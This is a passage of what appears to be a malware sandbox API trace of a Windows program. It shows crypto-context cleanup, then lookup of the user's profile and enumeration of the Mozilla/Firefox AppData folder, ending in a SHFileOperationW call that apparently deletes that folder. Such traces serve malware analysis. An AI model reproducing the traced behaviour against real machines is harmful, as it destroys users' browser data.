lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0138.550] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0138.550] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0138.550] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0138.550] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0138.550] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0138.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0138.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa2b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0138.550] CryptDestroyKey (hKey=0x9a43c0) returned 1 [0138.550] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0138.550] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0138.550] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0138.550] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0138.550] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0138.550] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0138.551] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0138.551] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0138.551] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0138.551] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0138.551] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0138.551] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0138.551] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0138.551] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0138.596] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0138.596] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0138.596] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0138.596] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0138.596] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0138.596] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0138.596] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0138.596] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0138.596] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0138.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.597] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0138.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.597] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0138.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.597] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0138.597] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.597] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0138.597] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.597] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.597] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0138.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.597] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0138.597] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0138.597] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0138.597] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0138.597] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0138.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.597] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0138.597] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0138.597] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0138.597] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0138.598] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0138.598] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0138.598] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0138.598] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0138.598] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0138.598] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0138.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0138.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0138.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0138.598] CryptReleaseContext (hProv=0x9bea28, dwFlags=0x0) returned 1 [0138.598] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.598] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0138.598] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0138.598] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0138.598] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0138.598] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0138.598] FreeLibrary (hLibModule=0x76390000) returned 1 [0138.598] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.598] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0138.598] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.598] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.598] CloseHandle (hObject=0x4b0) returned 1 [0138.599] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.599] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0138.599] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0138.600] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0138.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0138.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0138.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0138.600] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Mozilla", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpFilePart=0x8cedf4*="Mozilla") returned 0x27 [0138.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb160 | out: hHeap=0x2af0000) returned 1 [0138.600] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla")) returned 0x10 [0138.600] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9a4a40 [0138.600] FindNextFileW (in: hFindFile=0x9a4a40, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0138.600] FindNextFileW (in: hFindFile=0x9a4a40, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8b64ce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0138.600] FindNextFileW (in: hFindFile=0x9a4a40, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Firefox", cAlternateFileName="")) returned 1 [0138.600] FindNextFileW (in: hFindFile=0x9a4a40, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Firefox", cAlternateFileName="")) returned 0 [0138.601] FindClose (in: hFindFile=0x9a4a40 | out: hFindFile=0x9a4a40) returned 1 [0138.601] GetLastError () returned 0x12 [0138.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0138.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0138.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0138.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0138.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0138.601] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0138.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0138.601] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0138.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0138.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0138.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0138.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0138.602] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0138.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0138.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0138.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0138.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0138.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0138.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0138.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0138.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0138.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0138.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0138.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0138.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0138.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0138.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0138.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0138.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0138.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0138.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0138.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0138.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0138.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0138.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0138.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0138.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0138.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0138.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb4d0 [0138.603] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Mozilla", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpFilePart=0x8cf650*="Mozilla") returned 0x27 [0138.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb4d0 | out: hHeap=0x2af0000) returned 1 [0138.603] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla")) returned 0x10 [0138.604] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, 